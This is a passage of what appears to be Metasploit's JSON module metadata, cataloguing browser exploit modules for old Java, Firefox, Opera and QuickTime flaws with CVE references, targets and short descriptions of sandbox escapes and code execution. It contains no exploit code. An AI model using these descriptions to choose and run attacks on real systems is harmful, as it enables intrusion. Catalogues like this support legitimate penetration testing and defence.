"ref_name": "multi/browser/java_calendar_deserialize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_getsoundbank_bof": {
"name": "Sun Java JRE getSoundbank file:// URI Buffer Overflow",
"full_name": "exploit/multi/browser/java_getsoundbank_bof",
"rank": 500,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"kf <kf_list@digitalmunition.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a flaw in the getSoundbank function in the Sun JVM.\n\n The payload is serialized and passed to the applet via PARAM tags. It must be\n a native payload.\n\n The effected Java versions are JDK and JRE 6 Update 16 and earlier,\n JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\n earlier, and SDK and JRE 1.3.1_26 and earlier.\n\n NOTE: Although all of the above versions are reportedly vulnerable, only\n 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.",
"references": [
"CVE-2009-3867",
"OSVDB-59711",
"BID-36881",
"ZDI-09-076"
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"J2SE 1.6_16 on Windows x86",
"J2SE 1.6_16 on Mac OS X PPC",
"J2SE 1.6_16 on Mac OS X x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_getsoundbank_bof.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_getsoundbank_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_driver_manager": {
"name": "Java Applet Driver Manager Privileged toString() Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_driver_manager",
"rank": 600,
"disclosure_date": "2013-01-10",
"type": "exploit",
"author": [
"James Forshaw",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the java.sql.DriverManager class where the toString() method\n is called over user supplied classes from a doPrivileged block. The vulnerability\n affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer\n and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java\n Web Start can be launched automatically through the ActiveX control. Otherwise, the\n applet is launched without click-to-play bypass.",
"references": [
"CVE-2013-1488",
"OSVDB-91472",
"BID-58504",
"URL-http://www.contextis.com/research/blog/java-pwn2own/",
"URL-http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html",
"ZDI-13-076"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_driver_manager.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_driver_manager",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_exec": {
"name": "Java 7 Applet Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_exec",
"rank": 600,
"disclosure_date": "2012-08-26",
"type": "exploit",
"author": [
"Adam Gowdiak",
"James Forshaw",
"jduck <jduck@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "The exploit takes advantage of two issues in JDK 7: The ClassFinder and\n MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a\n replacement for classForName back in JDK 6. It allows untrusted code to obtain a\n reference and have access to a restricted package in JDK 7, which can be used to\n abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit, we can\n actually invoke getField() by abusing findMethod() in Statement.invokeInternal()\n (but getField() must be public, and that's not always the case in JDK 6) in order\n to access Statement.acc's private field, modify AccessControlContext, and then\n disable Security Manager. Once Security Manager is disabled, we can execute\n arbitrary Java code.\n\n Our exploit has been tested successfully against multiple platforms, including:\n IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.",
"references": [
"CVE-2012-4681",
"OSVDB-84867",
"URL-http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html",
"URL-http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html",
"URL-http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/",
"URL-http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html",
"URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=852051"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_exec.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_glassfish_averagerangestatisticimpl": {
"name": "Java Applet AverageRangeStatisticImpl Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl",
"rank": 600,
"disclosure_date": "2012-10-16",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the AverageRangeStatisticImpl from a Java Applet to run\n arbitrary Java code outside of the sandbox, a different exploit vector than the one\n exploited in the wild in November of 2012. The vulnerability affects Java version\n 7u7 and earlier.",
"references": [
"CVE-2012-5076",
"OSVDB-86363",
"BID-56054",
"URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076",
"URL-http://www.security-explorations.com/materials/se-2012-01-report.pdf"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_glassfish_averagerangestatisticimpl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_jaxws": {
"name": "Java Applet JAX-WS Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_jaxws",
"rank": 600,
"disclosure_date": "2012-10-16",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java\n code outside of the sandbox as exploited in the wild in November of 2012. The\n vulnerability affects Java version 7u7 and earlier.",
"references": [
"CVE-2012-5076",
"OSVDB-86363",
"BID-56054",
"URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html",
"URL-http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html",
"URL-http://blogs.technet.com/b/mmpc/archive/2012/11/15/a-technical-analysis-on-new-java-vulnerability-cve-2012-5076.aspx"
],
"platform": "Java,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_jaxws.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_jaxws",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_jmxbean": {
"name": "Java Applet JMX Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_jmxbean",
"rank": 600,
"disclosure_date": "2013-01-10",
"type": "exploit",
"author": [
"Unknown",
"egypt <egypt@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the JMX classes from a Java Applet to run arbitrary Java\n code outside of the sandbox as exploited in the wild in January of 2013. The\n vulnerability affects Java version 7u10 and earlier.",
"references": [
"CVE-2013-0422",
"OSVDB-89059",
"US-CERT-VU-625617",
"URL-http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html",
"URL-http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/",
"URL-http://pastebin.com/cUG2ayjh"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_jmxbean.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_jmxbean",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_jmxbean_2": {
"name": "Java Applet JMX Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_jmxbean_2",
"rank": 600,
"disclosure_date": "2013-01-19",
"type": "exploit",
"author": [
"Unknown",
"Adam Gowdiak",
"SecurityObscurity",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the JMX classes from a Java Applet to run arbitrary Java code\n outside of the sandbox as exploited in the wild in February of 2013. Additionally,\n this module bypasses default security settings introduced in Java 7 Update 10 to run\n unsigned applet without displaying any warning to the user.",
"references": [
"CVE-2013-0431",
"OSVDB-89613",
"BID-57726",
"URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf",
"URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf",
"URL-http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html",
"URL-http://pastebin.com/QWU1rqjf",
"URL-http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_jmxbean_2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_method_handle": {
"name": "Java Applet Method Handle Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_method_handle",
"rank": 600,
"disclosure_date": "2012-10-16",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the Method Handle class from a Java Applet to run arbitrary\n Java code outside of the sandbox. The vulnerability affects Java version 7u7 and\n earlier.",
"references": [
"CVE-2012-5088",
"OSVDB-86352",
"BID-56057",
"URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf",
"URL-http://www.security-explorations.com/materials/se-2012-01-report.pdf"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_method_handle.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_method_handle",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_provider_skeleton": {
"name": "Java Applet ProviderSkeleton Insecure Invoke Method",
"full_name": "exploit/multi/browser/java_jre17_provider_skeleton",
"rank": 500,
"disclosure_date": "2013-06-18",
"type": "exploit",
"author": [
"Adam Gowdiak",
"Matthias Kaiser"
],
"description": "This module abuses the insecure invoke() method of the ProviderSkeleton class that\n allows to call arbitrary static methods with user supplied arguments. The vulnerability\n affects Java version 7u21 and earlier.",
"references": [
"CVE-2013-2460",
"OSVDB-94346",
"URL-http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html",
"URL-http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a",
"URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf",
"URL-http://www.security-explorations.com/materials/se-2012-01-61.zip"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_provider_skeleton",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_reflection_types": {
"name": "Java Applet Reflection Type Confusion Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_reflection_types",
"rank": 600,
"disclosure_date": "2013-01-10",
"type": "exploit",
"author": [
"Jeroen Frijters",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses Java Reflection to generate a Type Confusion, due to a weak\n access control when setting final fields on static classes, and run code outside of\n the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This\n exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is\n applied mainly to IE, when Java Web Start can be launched automatically throw the\n ActiveX control. Otherwise the applet is launched without click-to-play bypass.",
"references": [
"CVE-2013-2423",
"OSVDB-92348",
"BID-59162",
"URL-http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0",
"URL-http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html",
"URL-http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/b453d9be6b3f",
"URL-http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_reflection_types.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_reflection_types",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_rhino": {
"name": "Java Applet Rhino Script Engine Remote Code Execution",
"full_name": "exploit/multi/browser/java_rhino",
"rank": 600,
"disclosure_date": "2011-10-18",
"type": "exploit",
"author": [
"Michael Schierl",
"juan vazquez <juan.vazquez@metasploit.com>",
"Edward D. Teach <teach@consortium-of-pwners.net>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Rhino Script Engine that\n can be used by a Java Applet to run arbitrary Java code outside of\n the sandbox. The vulnerability affects version 7 and version 6 update\n 27 and earlier, and should work on any browser that supports Java\n (for example: IE, Firefox, Google Chrome, etc)",
"references": [
"CVE-2011-3544",
"OSVDB-76500",
"ZDI-11-305",
"URL-http://schierlm.users.sourceforge.net/CVE-2011-3544.html"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Apple OSX",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_rhino.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_rhino",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_rmi_connection_impl": {
"name": "Java RMIConnectionImpl Deserialization Privilege Escalation",
"full_name": "exploit/multi/browser/java_rmi_connection_impl",
"rank": 600,
"disclosure_date": "2010-03-31",
"type": "exploit",
"author": [
"Sami Koivu",
"Matthias Kaiser",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Java Runtime Environment\n that allows to deserialize a MarshalledObject containing a custom\n classloader under a privileged context. The vulnerability affects\n version 6 prior to update 19 and version 5 prior to update 23.",
"references": [
"CVE-2010-0094",
"OSVDB-63484",
"URL-http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-rmiconnectionimpl-deserialization.html"
],
"platform": "Java",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_rmi_connection_impl.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_rmi_connection_impl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_setdifficm_bof": {
"name": "Sun Java JRE AWT setDiffICM Buffer Overflow",
"full_name": "exploit/multi/browser/java_setdifficm_bof",
"rank": 500,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a flaw in the setDiffICM function in the Sun JVM.\n\n The payload is serialized and passed to the applet via PARAM tags. It must be\n a native payload.\n\n The effected Java versions are JDK and JRE 6 Update 16 and earlier,\n JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\n earlier, and SDK and JRE 1.3.1_26 and earlier.\n\n NOTE: Although all of the above versions are reportedly vulnerable, only\n 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.",
"references": [
"CVE-2009-3869",
"OSVDB-59710",
"BID-36881",
"ZDI-09-078"
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"J2SE 1.6_16 on Windows x86",
"J2SE 1.6_16 on Mac OS X PPC",
"J2SE 1.6_16 on Mac OS X x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_setdifficm_bof.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_setdifficm_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_signed_applet": {
"name": "Java Signed Applet Social Engineering Code Execution",
"full_name": "exploit/multi/browser/java_signed_applet",
"rank": 600,
"disclosure_date": "1997-02-19",
"type": "exploit",
"author": [
"natron <natron@metasploit.com>"
],
"description": "This exploit dynamically creates a .jar file via the\n Msf::Exploit::Java mixin, then signs the it. The resulting\n signed applet is presented to the victim via a web page with\n an applet tag. The victim's JVM will pop a dialog asking if\n they trust the signed applet.\n\n On older versions the dialog will display the value of CERTCN\n in the \"Publisher\" line. Newer JVMs display \"UNKNOWN\" when the\n signature is not trusted (i.e., it's not signed by a trusted\n CA). The SigningCert option allows you to provide a trusted\n code signing cert, the values in which will override CERTCN.\n If SigningCert is not given, a randomly generated self-signed\n cert will be used.\n\n Either way, once the user clicks \"run\", the applet executes\n with full user permissions.",
"references": [
"URL-http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Linux x86 (Native Payload)",
"Mac OS X PPC (Native Payload)",
"Mac OS X x86 (Native Payload)"
],
"mod_time": "2018-03-01 08:41:28 +0000",
"path": "/modules/exploits/multi/browser/java_signed_applet.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_signed_applet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_storeimagearray": {
"name": "Java storeImageArray() Invalid Array Indexing Vulnerability",
"full_name": "exploit/multi/browser/java_storeimagearray",
"rank": 500,
"disclosure_date": "2013-08-12",
"type": "exploit",
"author": [
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses an Invalid Array Indexing Vulnerability on the\n static function storeImageArray() function in order to cause a\n memory corruption and escape the Java Sandbox. The vulnerability\n affects Java version 7u21 and earlier. The module, which doesn't bypass\n click2play, has been tested successfully on Java 7u21 on Windows and\n Linux systems.",
"references": [
"CVE-2013-2465",
"OSVDB-96269",
"EDB-27526",
"PACKETSTORM-122777",
"URL-http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_storeimagearray.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_storeimagearray",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_trusted_chain": {
"name": "Java Statement.invoke() Trusted Method Chain Privilege Escalation",
"full_name": "exploit/multi/browser/java_trusted_chain",
"rank": 600,
"disclosure_date": "2010-03-31",
"type": "exploit",
"author": [
"Sami Koivu",
"Matthias Kaiser",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a vulnerability in Java Runtime Environment\n that allows an untrusted method to run in a privileged context. The\n vulnerability affects version 6 prior to update 19 and version 5\n prior to update 23.",
"references": [
"CVE-2010-0840",
"OSVDB-63483",
"URL-http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-trusted-method-chaining-cve-2010.html"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_trusted_chain.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_trusted_chain",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_verifier_field_access": {
"name": "Java Applet Field Bytecode Verifier Cache Remote Code Execution",
"full_name": "exploit/multi/browser/java_verifier_field_access",
"rank": 600,
"disclosure_date": "2012-06-06",
"type": "exploit",
"author": [
"Stefan Cornelius",
"mihi",
"littlelightlittlefire",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in HotSpot bytecode verifier where an invalid\n optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient\n type checks. This allows a way to escape the JRE sandbox, and load additional classes\n in order to perform malicious operations.",
"references": [
"CVE-2012-1723",
"OSVDB-82877",
"BID-52161",
"URL-http://schierlm.users.sourceforge.net/CVE-2012-1723.html",
"URL-http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=829373",
"URL-http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/253e7c32def9",
"URL-http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/8f86ad60699b"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X PPC (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/browser/java_verifier_field_access.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_verifier_field_access",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/mozilla_compareto": {
"name": "Mozilla Suite/Firefox compareTo() Code Execution",
"full_name": "exploit/multi/browser/mozilla_compareto",
"rank": 300,
"disclosure_date": "2005-07-13",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Aviv Raff <avivra@gmail.com>"
],
"description": "This module exploits a code execution vulnerability in the Mozilla\n Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\n module is a direct port of Aviv Raff's HTML PoC.",
"references": [
"CVE-2005-2265",
"OSVDB-17968",
"BID-14242",
"URL-http://www.mozilla.org/security/announce/mfsa2005-50.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox < 1.0.5, Mozilla < 1.7.10, Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/mozilla_compareto.rb",
"is_install_path": true,
"ref_name": "multi/browser/mozilla_compareto",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/mozilla_navigatorjava": {
"name": "Mozilla Suite/Firefox Navigator Object Code Execution",
"full_name": "exploit/multi/browser/mozilla_navigatorjava",
"rank": 300,
"disclosure_date": "2006-07-25",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a code execution vulnerability in the Mozilla\n Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\n requires the Java plugin to be installed.",
"references": [
"CVE-2006-3677",
"OSVDB-27559",
"BID-19192",
"URL-http://www.mozilla.org/security/announce/mfsa2006-45.html"
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 1.5.0.4 Windows x86",
"Firefox 1.5.0.4 Linux x86",
"Firefox 1.5.0.4 Mac OS X PPC",
"Firefox 1.5.0.4 Mac OS X x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/mozilla_navigatorjava.rb",
"is_install_path": true,
"ref_name": "multi/browser/mozilla_navigatorjava",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/msfd_rce_browser": {
"name": "Metasploit msfd Remote Code Execution via Browser",
"full_name": "exploit/multi/browser/msfd_rce_browser",
"rank": 300,
"disclosure_date": "2018-04-11",
"type": "exploit",
"author": [
"Robin Stenvi <robin.stenvi@gmail.com>"
],
"description": "Metasploit's msfd-service makes it possible to get a msfconsole-like\n interface over a TCP socket. This module connects to the msfd-socket\n through the victim's browser.\n\n To execute msfconsole-commands in JavaScript from a web application,\n this module places the payload in the POST-data. These POST-requests\n can be sent cross-domain and can therefore be sent to localhost on the\n victim's machine. The msfconsole-command to execute code is 'rbi -e\n \"CODE\"'.\n\n Exploitation when the browser is running on Windows is unreliable and\n the exploit is only usable when IE is used and the quiet-flag has been\n passed to msf-daemon.",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-04-27 18:35:30 +0000",
"path": "/modules/exploits/multi/browser/msfd_rce_browser.rb",
"is_install_path": true,
"ref_name": "multi/browser/msfd_rce_browser",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/opera_configoverwrite": {
"name": "Opera 9 Configuration Overwrite",
"full_name": "exploit/multi/browser/opera_configoverwrite",
"rank": 600,
"disclosure_date": "2007-03-05",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Opera web browser in versions <= 9.10 allows unrestricted script\n access to its configuration page, opera:config, allowing an\n attacker to change settings and potentially execute arbitrary\n code.",
"references": [
"OSVDB-66472"
],
"platform": "Unix",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Opera < 9.10 Unix Cmd"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/opera_configoverwrite.rb",
"is_install_path": true,
"ref_name": "multi/browser/opera_configoverwrite",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/opera_historysearch": {
"name": "Opera historysearch XSS",
"full_name": "exploit/multi/browser/opera_historysearch",
"rank": 600,
"disclosure_date": "2008-10-23",
"type": "exploit",
"author": [
"Roberto Suggi",
"Aviv Raff <avivra@gmail.com>",
"egypt <egypt@metasploit.com>"
],
"description": "Certain constructs are not escaped correctly by Opera's History\n Search results. These can be used to inject scripts into the\n page, which can then be used to modify configuration settings\n and execute arbitrary commands. Affects Opera versions between\n 9.50 and 9.61.",
"references": [
"CVE-2008-4696",
"OSVDB-49472",
"BID-31869",
"URL-http://www.opera.com/support/kb/view/903/"
],
"platform": "Unix",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Opera < 9.61 Unix Cmd"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/opera_historysearch.rb",
"is_install_path": true,
"ref_name": "multi/browser/opera_historysearch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/qtjava_pointer": {
"name": "Apple QTJava toQTPointer() Arbitrary Memory Access",
"full_name": "exploit/multi/browser/qtjava_pointer",
"rank": 600,
"disclosure_date": "2007-04-23",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"kf <kf_list@digitalmunition.com>",
"ddz <ddz@theta44.org>"
],
"description": "This module exploits an arbitrary memory access vulnerability in the\n Quicktime for Java API provided with Quicktime 7.",
"references": [
"CVE-2007-2175",
"OSVDB-34178",
